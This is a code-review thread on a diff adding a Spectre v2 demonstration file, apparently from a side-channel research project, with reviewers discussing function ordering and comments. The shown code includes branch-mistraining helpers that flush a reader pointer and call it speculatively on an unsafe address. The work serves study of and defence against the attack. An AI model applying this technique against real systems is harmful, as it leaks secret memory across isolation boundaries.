demos/spectre_v2.cc

```diff
@@ -0,0 +1,296 @@
+    GenerateNop();
+    Nops<N - 1>::generate();
+  }
+};
+
+template<> struct Nops<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate() {
+    // Empty.
+  }
+};
+
+// Fetches an address N-times in a real reader.
+template<unsigned int N> struct Fetches {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(const void *addr) {
+    (void)*reinterpret_cast<const volatile char *>(addr);
+    Fetches<N - 1>::generate(addr);
+  }
+};
+
+template<> struct Fetches<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(const void *addr) {
+    // Empty.
+  }
+};
+
+// Repeatedly indirectly invokes a real reader on a safe address in the
+// LeakByte.
+template<unsigned int N> struct SafeCalls {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (*real_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL *real_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *safe_address) {
+    real_reader(safe_address);
+    SafeCalls<N - 1>::generate(real_reader, safe_address);
+  }
+};
+
+template<> struct SafeCalls<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (*real_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL *real_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *safe_address) {
+    // Empty.
+  }
+};
+
+// Repeatedly flushes a dummy reader from the cache and invokes it on an
+// unsafe address in LeakByte.
+template<unsigned int N> struct DummyCalls {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (**dummy_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL **dummy_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *unsafe_address) {
+    CLFlush(dummy_reader);
+    (*dummy_reader)(unsafe_address);
+    DummyCalls<N - 1>::generate(dummy_reader, unsafe_address);
+  }
+};
+
+template<> struct DummyCalls<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (**dummy_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL **dummy_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *unsafe_address) {
+    // Empty.
+  }
+};
+
+// We fastcall the readers in the 32-bit mode so that there is only one
+// instruction. Otherwise there would be two (fetch the pointer from the stack
+// and fetch from the pointer).
+void
+#if SAFESIDE_IA32
+SAFESIDE_FASTCALL
+#endif
+FirstActualRead(const void *addr) {
+  // We read the value 100 times to have enough places to jump to.
+  Fetches<100>::generate(addr);
+}
+
+// DummyRead is between the two real reads, so that misjump chances are the
```

Comment:
Is this the right place for this comment? The following code seems to be a function that does no-ops versus the function that places the DummyRead between the two real reads?

Reply:
The functions are linked in the order in which they are declared and that is important in here - that the real readers are not declared together, but they surround the dummy reader. Should I remove the comment?

Reply:
The comment can stay, but I think the extra detail (and assumptions) in your response belong here too.

Also: there's no guarantee at all that functions will appear in the binary in the order they're listed here, so if that's critical we might want to add a runtime check of addresses to notice if it goes wrong.

We should also explain why we think putting this function between the two others makes the "misjump chances ... the highest possible"